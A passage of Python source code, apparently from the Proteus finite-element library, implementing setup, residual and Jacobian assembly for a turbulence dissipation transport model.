elementQuadratureDict[('stab',) + I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
if reactionLumping:
for ci in list(self.coefficients.mass.keys()):
elementQuadratureDict[('r', ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
for I in self.coefficients.elementIntegralKeys:
elementQuadratureDict[('stab',) + I[1:]] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
elementBoundaryQuadratureDict = {}
if isinstance(elementBoundaryQuadrature, dict): # set terms manually
for I in self.coefficients.elementBoundaryIntegralKeys:
if I in elementBoundaryQuadrature:
elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature[I]
else:
elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature['default']
else:
for I in self.coefficients.elementBoundaryIntegralKeys:
elementBoundaryQuadratureDict[I] = elementBoundaryQuadrature
#
# find the union of all element quadrature points and
# build a quadrature rule for each integral that has a
# weight at each point in the union
# mwf include tag telling me which indices are which quadrature rule?
(self.elementQuadraturePoints, self.elementQuadratureWeights,
self.elementQuadratureRuleIndeces) = proteus.Quadrature.buildUnion(elementQuadratureDict)
self.nQuadraturePoints_element = self.elementQuadraturePoints.shape[0]
self.nQuadraturePoints_global = self.nQuadraturePoints_element * self.mesh.nElements_global
#
# Repeat the same thing for the element boundary quadrature
#
(self.elementBoundaryQuadraturePoints,
self.elementBoundaryQuadratureWeights,
self.elementBoundaryQuadratureRuleIndeces) = proteus.Quadrature.buildUnion(elementBoundaryQuadratureDict)
self.nElementBoundaryQuadraturePoints_elementBoundary = self.elementBoundaryQuadraturePoints.shape[0]
self.nElementBoundaryQuadraturePoints_global = (self.mesh.nElements_global *
self.mesh.nElementBoundaries_element *
self.nElementBoundaryQuadraturePoints_elementBoundary)
# if isinstance(self.u[0].femSpace,C0_AffineLinearOnSimplexWithNodalBasis):
# print self.nQuadraturePoints_element
# if self.nSpace_global == 3:
# assert(self.nQuadraturePoints_element == 5)
# elif self.nSpace_global == 2:
# assert(self.nQuadraturePoints_element == 6)
# elif self.nSpace_global == 1:
# assert(self.nQuadraturePoints_element == 3)
#
# print self.nElementBoundaryQuadraturePoints_elementBoundary
# if self.nSpace_global == 3:
# assert(self.nElementBoundaryQuadraturePoints_elementBoundary == 4)
# elif self.nSpace_global == 2:
# assert(self.nElementBoundaryQuadraturePoints_elementBoundary == 4)
# elif self.nSpace_global == 1:
# assert(self.nElementBoundaryQuadraturePoints_elementBoundary == 1)
#
# storage dictionaries
self.scalars_element = set()
#
# simplified allocations for test==trial and also check if space is mixed or not
#
self.q = {}
self.ebq = {}
self.ebq_global = {}
self.ebqe = {}
self.phi_ip = {}
# mesh
#self.q['x'] = np.zeros((self.mesh.nElements_global,self.nQuadraturePoints_element,3),'d')
self.ebqe['x'] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary, 3), 'd')
self.ebqe['n'] = np.zeros(
(self.mesh.nExteriorElementBoundaries_global,
self.nElementBoundaryQuadraturePoints_elementBoundary,
self.nSpace_global),
'd')
self.q[('u', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
self.q[('grad(u)', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element, self.nSpace_global), 'd')
#diffusion, isotropic
self.q[('a', 0, 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element, self.nSpace_global), 'd')
self.q[('da', 0, 0, 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element, self.nSpace_global), 'd')
# linear potential
self.q[('phi', 0)] = self.q[('u', 0)]
self.q[('grad(phi)', 0)] = self.q[('grad(u)', 0)]
self.q[('dphi', 0, 0)] = np.ones((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
# mass
self.q[('m', 0)] = self.q[('u', 0)]
self.q[('m_last', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
self.q[('m_tmp', 0)] = self.q[('u', 0)]
self.q[('cfl', 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
self.q[('numDiff', 0, 0)] = np.zeros((self.mesh.nElements_global, self.nQuadraturePoints_element), 'd')
self.ebqe[('u', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
self.ebqe[('grad(u)', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global,
self.nElementBoundaryQuadraturePoints_elementBoundary, self.nSpace_global), 'd')
self.ebqe[('advectiveFlux_bc_flag', 0)] = np.zeros(
(self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'i')
self.ebqe[('advectiveFlux_bc', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
self.ebqe[('advectiveFlux', 0)] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
self.ebqe[('diffusiveFlux_bc_flag', 0, 0)] = np.zeros(
(self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'i')
self.ebqe[('diffusiveFlux_bc', 0, 0)] = np.zeros(
(self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
self.ebqe[('penalty')] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
self.points_elementBoundaryQuadrature = set()
self.scalars_elementBoundaryQuadrature = set([('u', ci) for ci in range(self.nc)])
self.vectors_elementBoundaryQuadrature = set()
self.tensors_elementBoundaryQuadrature = set()
self.inflowBoundaryBC = {}
self.inflowBoundaryBC_values = {}
self.inflowFlux = {}
for cj in range(self.nc):
self.inflowBoundaryBC[cj] = np.zeros((self.mesh.nExteriorElementBoundaries_global,), 'i')
self.inflowBoundaryBC_values[cj] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nDOF_trial_element[cj]), 'd')
self.inflowFlux[cj] = np.zeros((self.mesh.nExteriorElementBoundaries_global, self.nElementBoundaryQuadraturePoints_elementBoundary), 'd')
self.internalNodes = set(range(self.mesh.nNodes_global))
# identify the internal nodes this is ought to be in mesh
# \todo move this to mesh
for ebNE in range(self.mesh.nExteriorElementBoundaries_global):
ebN = self.mesh.exteriorElementBoundariesArray[ebNE]
eN_global = self.mesh.elementBoundaryElementsArray[ebN, 0]
ebN_element = self.mesh.elementBoundaryLocalElementBoundariesArray[ebN, 0]
for i in range(self.mesh.nNodes_element):
if i != ebN_element:
I = self.mesh.elementNodesArray[eN_global, i]
self.internalNodes -= set([I])
self.nNodes_internal = len(self.internalNodes)
self.internalNodesArray = np.zeros((self.nNodes_internal,), 'i')
for nI, n in enumerate(self.internalNodes):
self.internalNodesArray[nI] = n
#
del self.internalNodes
self.internalNodes = None
prof.logEvent("Updating local to global mappings", 2)
self.updateLocal2Global()
prof.logEvent("Building time integration object", 2)
prof.logEvent(prof.memory("inflowBC, internalNodes,updateLocal2Global", "OneLevelTransport"), level=4)
# mwf for interpolating subgrid error for gradients etc
if self.stabilization and self.stabilization.usesGradientStabilization:
self.timeIntegration = TimeIntegrationClass(self, integrateInterpolationPoints=True)
else:
self.timeIntegration = TimeIntegrationClass(self)
if options is not None:
self.timeIntegration.setFromOptions(options)
prof.logEvent(prof.memory("TimeIntegration", "OneLevelTransport"), level=4)
prof.logEvent("Calculating numerical quadrature formulas", 2)
self.calculateQuadrature()
self.setupFieldStrides()
comm = proteus.Comm.get()
self.comm = comm
if comm.size() > 1:
assert numericalFluxType is not None and numericalFluxType.useWeakDirichletConditions, "You must use a numerical flux to apply weak boundary conditions for parallel runs"
prof.logEvent(prof.memory("stride+offset", "OneLevelTransport"), level=4)
if numericalFluxType is not None:
if options is None or options.periodicDirichletConditions is None:
self.numericalFlux = numericalFluxType(self,
dofBoundaryConditionsSetterDict,
advectiveFluxBoundaryConditionsSetterDict,
diffusiveFluxBoundaryConditionsSetterDictDict)
else:
self.numericalFlux = numericalFluxType(self,
dofBoundaryConditionsSetterDict,
advectiveFluxBoundaryConditionsSetterDict,
diffusiveFluxBoundaryConditionsSetterDictDict,
options.periodicDirichletConditions)
else:
self.numericalFlux = None
# set penalty terms
# cek todo move into numerical flux initialization
if 'penalty' in self.ebq_global:
for ebN in range(self.mesh.nElementBoundaries_global):
for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):
self.ebq_global['penalty'][ebN, k] = old_div(self.numericalFlux.penalty_constant, \
(self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power))
# penalty term
# cek move to Numerical flux initialization
if 'penalty' in self.ebqe:
for ebNE in range(self.mesh.nExteriorElementBoundaries_global):
ebN = self.mesh.exteriorElementBoundariesArray[ebNE]
for k in range(self.nElementBoundaryQuadraturePoints_elementBoundary):
self.ebqe['penalty'][ebNE, k] = old_div(self.numericalFlux.penalty_constant, \
self.mesh.elementBoundaryDiametersArray[ebN]**self.numericalFlux.penalty_power)
prof.logEvent(prof.memory("numericalFlux", "OneLevelTransport"), level=4)
self.elementEffectiveDiametersArray = self.mesh.elementInnerDiametersArray
# use post processing tools to get conservative fluxes, None by default
from proteus import PostProcessingTools
self.velocityPostProcessor = PostProcessingTools.VelocityPostProcessingChooser(self)
prof.logEvent(prof.memory("velocity postprocessor", "OneLevelTransport"), level=4)
# helper for writing out data storage
from proteus import Archiver
self.elementQuadratureDictionaryWriter = Archiver.XdmfWriter()
self.elementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()
self.exteriorElementBoundaryQuadratureDictionaryWriter = Archiver.XdmfWriter()
# TODO get rid of this
# mwf can I use the numericalFlux's flag information?
for ci, fbcObject in list(self.fluxBoundaryConditionsObjectsDict.items()):
self.ebqe[('advectiveFlux_bc_flag', ci)] = np.zeros(self.ebqe[('advectiveFlux_bc', ci)].shape, 'i')
for t, g in list(fbcObject.advectiveFluxBoundaryConditionsDict.items()):
if ci in self.coefficients.advection:
self.ebqe[('advectiveFlux_bc', ci)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
self.ebqe[('advectiveFlux_bc_flag', ci)][t[0], t[1]] = 1
for ck, diffusiveFluxBoundaryConditionsDict in list(fbcObject.diffusiveFluxBoundaryConditionsDictDict.items()):
self.ebqe[('diffusiveFlux_bc_flag', ck, ci)] = np.zeros(self.ebqe[('diffusiveFlux_bc', ck, ci)].shape, 'i')
for t, g in list(diffusiveFluxBoundaryConditionsDict.items()):
self.ebqe[('diffusiveFlux_bc', ck, ci)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
self.ebqe[('diffusiveFlux_bc_flag', ck, ci)][t[0], t[1]] = 1
if hasattr(self.numericalFlux, 'setDirichletValues'):
self.numericalFlux.setDirichletValues(self.ebqe)
if not hasattr(self.numericalFlux, 'isDOFBoundary'):
self.numericalFlux.isDOFBoundary = {0: np.zeros(self.ebqe[('u', 0)].shape, 'i')}
if not hasattr(self.numericalFlux, 'ebqe'):
self.numericalFlux.ebqe = {('u', 0): np.zeros(self.ebqe[('u', 0)].shape, 'd')}
# TODO how to handle redistancing calls for calculateCoefficients,calculateElementResidual etc
self.globalResidualDummy = None
compKernelFlag = 0
if self.nSpace_global == 2:
self.dissipation = cDissipation2D_base(self.nSpace_global,
self.nQuadraturePoints_element,
self.u[0].femSpace.elementMaps.localFunctionSpace.dim,
self.u[0].femSpace.referenceFiniteElement.localFunctionSpace.dim,
self.testSpace[0].referenceFiniteElement.localFunctionSpace.dim,
self.nElementBoundaryQuadraturePoints_elementBoundary,
compKernelFlag,
self.coefficients.aDarcy,
self.coefficients.betaForch,
self.coefficients.grain,
self.coefficients.packFraction,
self.coefficients.packMargin,
self.coefficients.maxFraction,
self.coefficients.frFraction,
self.coefficients.sigmaC,
self.coefficients.C3e,
self.coefficients.C4e,
self.coefficients.eR,
self.coefficients.fContact,
self.coefficients.mContact,
self.coefficients.nContact,
self.coefficients.angFriction,
self.coefficients.vos_limiter,
self.coefficients.mu_fr_limiter)
else:
self.dissipation = cDissipation_base(self.nSpace_global,
self.nQuadraturePoints_element,
self.u[0].femSpace.elementMaps.localFunctionSpace.dim,
self.u[0].femSpace.referenceFiniteElement.localFunctionSpace.dim,
self.testSpace[0].referenceFiniteElement.localFunctionSpace.dim,
self.nElementBoundaryQuadraturePoints_elementBoundary,
compKernelFlag,
self.coefficients.aDarcy,
self.coefficients.betaForch,
self.coefficients.grain,
self.coefficients.packFraction,
self.coefficients.packMargin,
self.coefficients.maxFraction,
self.coefficients.frFraction,
self.coefficients.sigmaC,
self.coefficients.C3e,
self.coefficients.C4e,
self.coefficients.eR,
self.coefficients.fContact,
self.coefficients.mContact,
self.coefficients.nContact,
self.coefficients.angFriction,
self.coefficients.vos_limiter,
self.coefficients.mu_fr_limiter)
self.forceStrongConditions = False
if self.forceStrongConditions:
self.dirichletConditionsForceDOF = DOFBoundaryConditions(self.u[0].femSpace, dofBoundaryConditionsSetterDict[0], weakDirichletConditions=False)
if self.movingDomain:
self.MOVING_DOMAIN = 1.0
else:
self.MOVING_DOMAIN = 0.0
# cek hack
self.movingDomain = False
self.MOVING_DOMAIN = 0.0
if self.mesh.nodeVelocityArray is None:
self.mesh.nodeVelocityArray = np.zeros(self.mesh.nodeArray.shape, 'd')
# mwf these are getting called by redistancing classes,
def calculateCoefficients(self):
pass
def calculateElementResidual(self):
if self.globalResidualDummy is not None:
self.getResidual(self.u[0].dof, self.globalResidualDummy)
def getResidual(self, u, r):
import pdb
import copy
"""
Calculate the element residuals and add in to the global residual
"""
r.fill(0.0)
# Load the unknowns into the finite element dof
self.timeIntegration.calculateCoefs()
# print "***************max/min(m_last)*********************",max(self.timeIntegration.m_last[0].flat[:]),min(self.timeIntegration.m_last[0].flat[:])
# print "***************max/min(m_last)*********************",max(-self.timeIntegration.dt*self.timeIntegration.beta_bdf[0].flat[:]),min(-self.timeIntegration.dt*self.timeIntegration.beta_bdf[0].flat[:]),
self.timeIntegration.calculateU(u)
self.setUnknowns(self.timeIntegration.u)
# cek can put in logic to skip of BC's don't depend on t or u
# Dirichlet boundary conditions
# if hasattr(self.numericalFlux,'setDirichletValues'):
self.numericalFlux.setDirichletValues(self.ebqe)
# flux boundary conditions
for t, g in list(self.fluxBoundaryConditionsObjectsDict[0].advectiveFluxBoundaryConditionsDict.items()):
self.ebqe[('advectiveFlux_bc', 0)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
self.ebqe[('advectiveFlux_bc_flag', 0)][t[0], t[1]] = 1
for ck, diffusiveFluxBoundaryConditionsDict in list(self.fluxBoundaryConditionsObjectsDict[0].diffusiveFluxBoundaryConditionsDictDict.items()):
for t, g in list(diffusiveFluxBoundaryConditionsDict.items()):
self.ebqe[('diffusiveFlux_bc', ck, 0)][t[0], t[1]] = g(self.ebqe[('x')][t[0], t[1]], self.timeIntegration.t)
self.ebqe[('diffusiveFlux_bc_flag', ck, 0)][t[0], t[1]] = 1
# self.shockCapturing.lag=True
if self.forceStrongConditions:
for dofN, g in list(self.dirichletConditionsForceDOF.DOFBoundaryConditionsDict.items()):
self.u[0].dof[dofN] = g(self.dirichletConditionsForceDOF.DOFBoundaryPointDict[dofN], self.timeIntegration.t)
#
# mwf debug
#import pdb
# pdb.set_trace()
argsDict = cArgumentsDict.ArgumentsDict()
argsDict["mesh_trial_ref"] = self.u[0].femSpace.elementMaps.psi
argsDict["mesh_grad_trial_ref"] = self.u[0].femSpace.elementMaps.grad_psi
argsDict["mesh_dof"] = self.mesh.nodeArray
argsDict["mesh_velocity_dof"] = self.mesh.nodeVelocityArray
argsDict["MOVING_DOMAIN"] = self.MOVING_DOMAIN
argsDict["mesh_l2g"] = self.mesh.elementNodesArray
argsDict["dV_ref"] = self.elementQuadratureWeights[('u', 0)]
argsDict["u_trial_ref"] = self.u[0].femSpace.psi
argsDict["u_grad_trial_ref"] = self.u[0].femSpace.grad_psi
argsDict["u_test_ref"] = self.u[0].femSpace.psi
argsDict["u_grad_test_ref"] = self.u[0].femSpace.grad_psi
argsDict["mesh_trial_trace_ref"] = self.u[0].femSpace.elementMaps.psi_trace
argsDict["mesh_grad_trial_trace_ref"] = self.u[0].femSpace.elementMaps.grad_psi_trace
argsDict["dS_ref"] = self.elementBoundaryQuadratureWeights[('u', 0)]
argsDict["u_trial_trace_ref"] = self.u[0].femSpace.psi_trace
argsDict["u_grad_trial_trace_ref"] = self.u[0].femSpace.grad_psi_trace
argsDict["u_test_trace_ref"] = self.u[0].femSpace.psi_trace
argsDict["u_grad_test_trace_ref"] = self.u[0].femSpace.grad_psi_trace
argsDict["normal_ref"] = self.u[0].femSpace.elementMaps.boundaryNormals
argsDict["boundaryJac_ref"] = self.u[0].femSpace.elementMaps.boundaryJacobians
argsDict["nElements_global"] = self.mesh.nElements_global
argsDict["nu_0"] = self.coefficients.nu_0
argsDict["nu_1"] = self.coefficients.nu_1
argsDict["sigma_e"] = self.coefficients.sigma_e
argsDict["c_mu"] = self.coefficients.c_mu
argsDict["c_1"] = self.coefficients.c_1
argsDict["c_2"] = self.coefficients.c_2
argsDict["c_e"] = self.coefficients.c_e
argsDict["rho_0"] = self.coefficients.rho_0
argsDict["rho_1"] = self.coefficients.rho_1
argsDict["sedFlag"] = self.coefficients.sedFlag
argsDict["q_vos"] = self.coefficients.q_vos
argsDict["q_vos_gradc"] = self.coefficients.grad_vos
argsDict["ebqe_q_vos"] = self.coefficients.ebqe_vos
argsDict["ebqe_q_vos_gradc"] = self.coefficients.ebqe_grad_vos
argsDict["rho_f"] = self.coefficients.rho_0
argsDict["rho_s"] = self.coefficients.rho_s
argsDict["vs"] = self.coefficients.vs
argsDict["ebqe_vs"] = self.coefficients.ebqe_vs
argsDict["g"] = self.coefficients.g
argsDict["dissipation_model_flag"] = self.coefficients.dissipation_model_flag
argsDict["useMetrics"] = self.coefficients.useMetrics
argsDict["alphaBDF"] = self.timeIntegration.alpha_bdf
argsDict["lag_shockCapturing"] = self.shockCapturing.lag
argsDict["shockCapturingDiffusion"] = self.shockCapturing.shockCapturingFactor
argsDict["sc_uref"] = self.coefficients.sc_uref
argsDict["sc_alpha"] = self.coefficients.sc_beta
argsDict["u_l2g"] = self.u[0].femSpace.dofMap.l2g
argsDict["elementDiameter"] = self.mesh.elementDiametersArray
argsDict["u_dof"] = self.u[0].dof
argsDict["u_dof_old"] = self.coefficients.u_old_dof
argsDict["velocity"] = self.coefficients.q_v
argsDict["phi_ls"] = self.coefficients.q_phi
argsDict["q_kappa"] = self.coefficients.q_kappa
argsDict["q_grad_kappa"] = self.coefficients.q_grad_kappa
argsDict["q_porosity"] = self.coefficients.q_porosity
argsDict["velocity_dof_u"] = self.coefficients.velocity_dof_u
argsDict["velocity_dof_v"] = self.coefficients.velocity_dof_v
argsDict["velocity_dof_w"] = self.coefficients.velocity_dof_w
argsDict["q_m"] = self.timeIntegration.m_tmp[0]
argsDict["q_u"] = self.q[('u', 0)]
argsDict["q_grad_u"] = self.q[('grad(u)', 0)]
argsDict["q_m_betaBDF"] = self.timeIntegration.beta_bdf[0]
argsDict["cfl"] = self.q[('cfl', 0)]
argsDict["q_numDiff_u"] = self.shockCapturing.numDiff[0]
argsDict["q_numDiff_u_last"] = self.shockCapturing.numDiff_last[0]
argsDict["ebqe_penalty_ext"] = self.ebqe['penalty']
argsDict["offset_u"] = self.offset[0]
argsDict["stride_u"] = self.stride[0]
argsDict["globalResidual"] = r
argsDict["nExteriorElementBoundaries_global"] = self.mesh.nExteriorElementBoundaries_global
argsDict["exteriorElementBoundariesArray"] = self.mesh.exteriorElementBoundariesArray
argsDict["elementBoundaryElementsArray"] = self.mesh.elementBoundaryElementsArray
argsDict["elementBoundaryLocalElementBoundariesArray"] = self.mesh.elementBoundaryLocalElementBoundariesArray
argsDict["ebqe_velocity_ext"] = self.coefficients.ebqe_v
argsDict["isDOFBoundary_u"] = self.numericalFlux.isDOFBoundary[0]
argsDict["ebqe_bc_u_ext"] = self.numericalFlux.ebqe[('u', 0)]
argsDict["isAdvectiveFluxBoundary_u"] = self.ebqe[('advectiveFlux_bc_flag', 0)]
argsDict["ebqe_bc_advectiveFlux_u_ext"] = self.ebqe[('advectiveFlux_bc', 0)]
argsDict["isDiffusiveFluxBoundary_u"] = self.ebqe[('diffusiveFlux_bc_flag', 0, 0)]
argsDict["ebqe_bc_diffusiveFlux_u_ext"] = self.ebqe[('diffusiveFlux_bc', 0, 0)]
argsDict["ebqe_phi"] = self.coefficients.ebqe_phi
argsDict["epsFact"] = self.coefficients.epsFact
argsDict["ebqe_kappa"] = self.coefficients.ebqe_kappa
argsDict["ebqe_porosity"] = self.coefficients.ebqe_porosity
argsDict["ebqe_u"] = self.ebqe[('u', 0)]
argsDict["ebqe_flux"] = self.ebqe[('advectiveFlux', 0)]
self.dissipation.calculateResidual(argsDict)
if self.forceStrongConditions:
for dofN, g in list(self.dirichletConditionsForceDOF.DOFBoundaryConditionsDict.items()):
r[dofN] = 0
if self.stabilization:
self.stabilization.accumulateSubgridMassHistory(self.q)
prof.logEvent("Global residual", level=9, data=r)
# mwf decide if this is reasonable for keeping solver statistics
self.nonlinear_function_evaluations += 1
if self.globalResidualDummy is None:
self.globalResidualDummy = np.zeros(r.shape, 'd')
def getJacobian(self, jacobian):
cfemIntegrals.zeroJacobian_CSR(self.nNonzerosInJacobian,
jacobian)
argsDict = cArgumentsDict.ArgumentsDict()
argsDict["mesh_trial_ref"] = self.u[0].femSpace.elementMaps.psi
argsDict["mesh_grad_trial_ref"] = self.u[0].femSpace.elementMaps.grad_psi
argsDict["mesh_dof"] = self.mesh.nodeArray
argsDict["mesh_velocity_dof"] = self.mesh.nodeVelocityArray
argsDict["MOVING_DOMAIN"] = self.MOVING_DOMAIN
argsDict["mesh_l2g"] = self.mesh.elementNodesArray
argsDict["dV_ref"] = self.elementQuadratureWeights[('u', 0)]
argsDict["u_trial_ref"] = self.u[0].femSpace.psi
argsDict["u_grad_trial_ref"] = self.u[0].femSpace.grad_psi
argsDict["u_test_ref"] = self.u[0].femSpace.psi
argsDict["u_grad_test_ref"] = self.u[0].femSpace.grad_psi
argsDict["mesh_trial_trace_ref"] = self.u[0].femSpace.elementMaps.psi_trace
argsDict["mesh_grad_trial_trace_ref"] = self.u[0].femSpace.elementMaps.grad_psi_trace
argsDict["dS_ref"] = self.elementBoundaryQuadratureWeights[('u', 0)]
argsDict["u_trial_trace_ref"] = self.u[0].femSpace.psi_trace
argsDict["u_grad_trial_trace_ref"] = self.u[0].femSpace.grad_psi_trace
argsDict["u_test_trace_ref"] = self.u[0].femSpace.psi_trace
argsDict["u_grad_test_trace_ref"] = self.u[0].femSpace.grad_psi_trace
argsDict["normal_ref"] = self.u[0].femSpace.elementMaps.boundaryNormals
argsDict["boundaryJac_ref"] = self.u[0].femSpace.elementMaps.boundaryJacobians
argsDict["nElements_global"] = self.mesh.nElements_global
argsDict["nu_0"] = self.coefficients.nu_0
argsDict["nu_1"] = self.coefficients.nu_1
argsDict["sigma_e"] = self.coefficients.sigma_e
argsDict["c_mu"] = self.coefficients.c_mu
argsDict["c_1"] = self.coefficients.c_1
argsDict["c_2"] = self.coefficients.c_2
argsDict["c_e"] = self.coefficients.c_e
argsDict["rho_0"] = self.coefficients.rho_0
argsDict["rho_1"] = self.coefficients.rho_1
argsDict["dissipation_model_flag"] = self.coefficients.dissipation_model_flag
argsDict["useMetrics"] = self.coefficients.useMetrics
argsDict["alphaBDF"] = self.timeIntegration.alpha_bdf
argsDict["lag_shockCapturing"] = self.shockCapturing.lag
argsDict["shockCapturingDiffusion"] = self.shockCapturing.shockCapturingFactor
argsDict["u_l2g"] = self.u[0].femSpace.dofMap.l2g
argsDict["elementDiameter"] = self.mesh.elementDiametersArray
argsDict["u_dof"] = self.u[0].dof
argsDict["u_dof_old"] = self.coefficients.u_old_dof
argsDict["velocity"] = self.coefficients.q_v
argsDict["phi_ls"] = self.coefficients.q_phi
argsDict["q_kappa"] = self.coefficients.q_kappa
argsDict["q_grad_kappa"] = self.coefficients.q_grad_kappa
argsDict["q_porosity"] = self.coefficients.q_porosity
argsDict["sedFlag"] = self.coefficients.sedFlag
argsDict["q_vos"] = self.coefficients.q_vos
argsDict["q_vos_gradc"] = self.coefficients.grad_vos
argsDict["ebqe_q_vos"] = self.coefficients.ebqe_vos
argsDict["ebqe_q_vos_gradc"] = self.coefficients.ebqe_grad_vos
argsDict["rho_f"] = self.coefficients.rho_0
argsDict["rho_s"] = self.coefficients.rho_s
argsDict["vs"] = self.coefficients.vs
argsDict["ebqe_vs"] = self.coefficients.ebqe_vs
argsDict["g"] = self.coefficients.g
argsDict["velocity_dof_u"] = self.coefficients.velocity_dof_u
argsDict["velocity_dof_v"] = self.coefficients.velocity_dof_v
argsDict["velocity_dof_w"] = self.coefficients.velocity_dof_w
argsDict["q_m_betaBDF"] = self.timeIntegration.beta_bdf[0]
argsDict["cfl"] = self.q[('cfl', 0)]
argsDict["q_numDiff_u_last"] = self.shockCapturing.numDiff_last[0]
argsDict["ebqe_penalty_ext"] = self.ebqe['penalty']
argsDict["csrRowIndeces_u_u"] = self.csrRowIndeces[(0, 0)]
argsDict["csrColumnOffsets_u_u"] = self.csrColumnOffsets[(0, 0)]
argsDict["globalJacobian"] = jacobian.getCSRrepresentation()[2]
argsDict["nExteriorElementBoundaries_global"] = self.mesh.nExteriorElementBoundaries_global
argsDict["exteriorElementBoundariesArray"] = self.mesh.exteriorElementBoundariesArray
argsDict["elementBoundaryElementsArray"] = self.mesh.elementBoundaryElementsArray
argsDict["elementBoundaryLocalElementBoundariesArray"] = self.mesh.elementBoundaryLocalElementBoundariesArray
argsDict["ebqe_velocity_ext"] = self.coefficients.ebqe_v
argsDict["isDOFBoundary_u"] = self.numericalFlux.isDOFBoundary[0]
argsDict["ebqe_bc_u_ext"] = self.numericalFlux.ebqe[('u', 0)]
argsDict["isAdvectiveFluxBoundary_u"] = self.ebqe[('advectiveFlux_bc_flag', 0)]
argsDict["ebqe_bc_advectiveFlux_u_ext"] = self.ebqe[('advectiveFlux_bc', 0)]
argsDict["isDiffusiveFluxBoundary_u"] = self.ebqe[('diffusiveFlux_bc_flag', 0, 0)]
argsDict["ebqe_bc_diffusiveFlux_u_ext"] = self.ebqe[('diffusiveFlux_bc', 0, 0)]
argsDict["csrColumnOffsets_eb_u_u"] = self.csrColumnOffsets_eb[(0, 0)]
argsDict["ebqe_phi"] = self.coefficients.ebqe_phi
argsDict["epsFact"] = self.coefficients.epsFact
argsDict["ebqe_kappa"] = self.coefficients.ebqe_kappa
argsDict["ebqe_porosity"] = self.coefficients.ebqe_porosity
self.dissipation.calculateJacobian(argsDict) # VRANS
# Load the Dirichlet conditions directly into residual
if self.forceStrongConditions:
scaling = 1.0 # probably want to add some scaling to match non-dirichlet diagonals in linear system
for dofN in list(self.dirichletConditionsForceDOF.DOFBoundaryConditionsDict.keys()):
global_dofN = dofN
for i in range(self.rowptr[global_dofN], self.rowptr[global_dofN + 1]):
if (self.colind[i] == global_dofN):
# print "RBLES forcing residual cj = %s dofN= %s global_dofN= %s was self.nzval[i]= %s now =%s " % (cj,dofN,global_dofN,self.nzval[i],scaling)
self.nzval[i] = scaling
else:
self.nzval[i] = 0.0
# print "RBLES zeroing residual cj = %s dofN= %s global_dofN= %s " % (cj,dofN,global_dofN)
prof.logEvent("Jacobian ", level=10, data=jacobian)
# mwf decide if this is reasonable for solver statistics
self.nonlinear_function_jacobian_evaluations += 1
return jacobian
def calculateElementQuadrature(self):
"""
Calculate the physical location and weights of the quadrature rules
and the shape information at the quadrature points.
This function should be called only when the mesh changes.
"""
# self.u[0].femSpace.elementMaps.getValues(self.elementQuadraturePoints,
# self.q['x'])
self.u[0].femSpace.elementMaps.getBasisValuesRef(self.elementQuadraturePoints)
self.u[0].femSpace.elementMaps.getBasisGradientValuesRef(self.elementQuadraturePoints)
self.u[0].femSpace.getBasisValuesRef(self.elementQuadraturePoints)
self.u[0].femSpace.getBasisGradientValuesRef(self.elementQuadraturePoints)
self.coefficients.initializeElementQuadrature(self.timeIntegration.t, self.q)
if self.stabilization is not None:
self.stabilization.initializeElementQuadrature(self.mesh, self.timeIntegration.t, self.q)
self.stabilization.initializeTimeIntegration(self.timeIntegration)
if self.shockCapturing is not None:
self.shockCapturing.initializeElementQuadrature(self.mesh, self.timeIntegration.t, self.q)
def calculateElementBoundaryQuadrature(self):
pass
def calculateExteriorElementBoundaryQuadrature(self):
"""
Calculate the physical location and weights of the quadrature rules
and the shape information at the quadrature points on global element boundaries.
This function should be called only when the mesh changes.
"""
#
# get physical locations of element boundary quadrature points
#
# assume all components live on the same mesh
self.u[0].femSpace.elementMaps.getBasisValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.elementMaps.getBasisGradientValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.getBasisValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.getBasisGradientValuesTraceRef(self.elementBoundaryQuadraturePoints)
self.u[0].femSpace.elementMaps.getValuesGlobalExteriorTrace(self.elementBoundaryQuadraturePoints,
self.ebqe['x'])
self.fluxBoundaryConditionsObjectsDict = dict([(cj, proteus.FemTools.FluxBoundaryConditions(self.mesh,
self.nElementBoundaryQuadraturePoints_elementBoundary,
self.ebqe[('x')],
getAdvectiveFluxBoundaryConditions=self.advectiveFluxBoundaryConditionsSetterDict[cj],
getDiffusiveFluxBoundaryConditions=self.diffusiveFluxBoundaryConditionsSetterDictDict[cj]))
